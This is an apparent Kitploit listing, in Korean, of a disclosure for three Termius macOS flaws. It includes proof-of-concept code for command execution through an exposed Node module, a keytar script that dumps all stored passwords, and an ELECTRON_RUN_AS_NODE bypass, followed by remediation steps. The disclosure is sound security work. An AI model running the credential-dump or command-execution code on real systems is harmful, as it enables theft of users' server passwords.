Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-Termius — 세 가지 치명적인 Termius macOS 결함에 대한 PoC가 포함된 취약점 공개: 노출된 Node 모듈을 통한 원격 코드 실행, 로컬 권한 상승 자격 증명 덤프, Electron 퓨즈 우회. 수정 지침 포함. | Kitploit
도구/GitHubGitHub/nicetop1027/cve-2026-termius
Vulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPapers & ResearchMisconfigurationLearning & Education
GitHubnicetop1027/cve-2026-termius

CVE-2026-Termius

세 가지 치명적인 Termius macOS 결함에 대한 PoC가 포함된 취약점 공개: 노출된 Node 모듈을 통한 원격 코드 실행, 로컬 권한 상승 자격 증명 덤프, Electron 퓨즈 우회. 수정 지침 포함.

저장소 보기
37개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Termius macOS 애플리케이션 취약점 보고서 (CVE-2026-Termius)

대상: Termius (macOS) 테스트 버전: 최신 (2026년 1월 기준) 영향: 원격 코드 실행 (RCE), 로컬 권한 상승 (LPE), 앱 보안 우회

🚨 실행 요약

Termius macOS 애플리케이션에서 공격자가 다음을 수행할 수 있게 하는 세 가지 심각한 취약점이 발견되었습니다:

  1. 임의 시스템 명령 실행 (RCE): 렌더러에 노출된 숨겨진 백도어 Symbol을 통해.
  2. 저장된 모든 비밀번호 덤프 (LPE): 노출된 keytar 네이티브 모듈을 악용하여.
  3. 앱 보안 완전 우회: 누락된 ELECTRON_RUN_AS_NODE 퓨즈를 이용하여.

1. 치명적: 숨겨진 Symbol을 통한 원격 코드 실행 (RCE)

취약점 세부 정보

애플리케이션은 강력한 Node.js 모듈(child_process, fs, electron)을 렌더러 프로세스(앱의 웹 인터페이스 부분)에 노출합니다. 이러한 모듈은 숨기기 위해 객체의 전역 뒤에 감춰져 있지만 안전하게 격리되지는 않습니다.

window
Symbol
  • 취약한 코드 패턴:
    root@kitploit:~
    // In extracted app source
    window[Symbol.for("preloadedModulesKey")] = {
        child_process: require('child_process'),
        // ...
    };
    

익스플로잇 (PoC)

크로스 사이트 스크립팅(XSS)을 달성한 공격자는 이 노출된 symbol을 사용하여 즉시 RCE로 확대할 수 있습니다.

poc_rce_via_symbol.js:

root@kitploit:~
// 1. Reconstruct the hidden key using Symbol.for (Global Registry)
const hiddenKey = Symbol.for("preloadedModulesKey");

// 2. Access the exposed backdoor object
const backdoor = window[hiddenKey];

if (backdoor && backdoor.child_process) {
    console.log("RCE Target Acquired.");
    // 3. Execute arbitrary system command (e.g., Calculator)
    backdoor.child_process.exec("open -a Calculator");
}

2. 치명적: 로컬 자격 증명 덤프 (LPE)

취약점 세부 정보

Termius가 macOS 키체인과 인터페이스하기 위해 사용하는 keytar 네이티브 Node 모듈도 동일한 숨겨진 Symbol을 통해 노출됩니다. 이를 통해 애플리케이션 컨텍스트 내에서 실행되는 모든 스크립트(예: 악성 플러그인, XSS 또는 로컬 프로세스 인젝션)가 저장된 모든 서버의 평문 비밀번호를 조회하고 가져올 수 있습니다.

익스플로잇 (PoC)

poc_lpe_dump_creds.js:

root@kitploit:~
const hiddenKey = Symbol.for("preloadedModulesKey");
const modules = window[hiddenKey];

// Find the keytar module (name may vary slightly)
const keytarModuleName = Object.keys(modules).find(k => k.includes("keytar"));
const keytar = modules[keytarModuleName];

// Dump credentials for the default service
keytar.findCredentials("Termius").then(credentials => {
    console.log("🔥🔥🔥 DUMPED CREDENTIALS 🔥🔥🔥");
    console.table(credentials);
});

3. 치명적: 누락된 Electron 퓨즈 (RunAsNode)

취약점 세부 정보

Termius 바이너리는 ELECTRON_RUN_AS_NODE 퓨즈를 비활성화하지 않습니다. 이는 모든 로컬 사용자가 서명된 Termius 바이너리를 표준 Node.js 실행 파일로 실행할 수 있게 하는 심각한 보안 구성 오류입니다. 이는 애플리케이션 로직에 대한 macOS 코드 서명 무결성 검사를 완전히 우회합니다.

익스플로잇 (PoC)

poc_fuse.sh:

root@kitploit:~
# Execute Termius as Node.js, running arbitrary code
ELECTRON_RUN_AS_NODE=1 /Applications/Termius.app/Contents/MacOS/Termius -e 'require("child_process").exec("open -a Calculator")'

수정 권장 사항 (개발자용)

  1. Electron 퓨즈 비활성화: 빌드 중에 @electron/fuses를 사용하여 RunAsNode 및 EnableNodeCliInspectArguments를 명시적으로 비활성화하세요.
  2. 전역 Symbol 노출 제거: 민감한 모듈을 window 또는 global에 첨부하지 마세요. 전체 모듈이 아닌 필요한 함수만 노출하는 제한된 API 표면과 함께 contextBridge.exposeInMainWorld를 사용하세요.
  3. IPC 검증: 모든 프로세스 간 통신(IPC)이 엄격하게 타입화되고 검증되도록 하세요.

Antigravity Agent가 생성한 보고서

도구 다운로드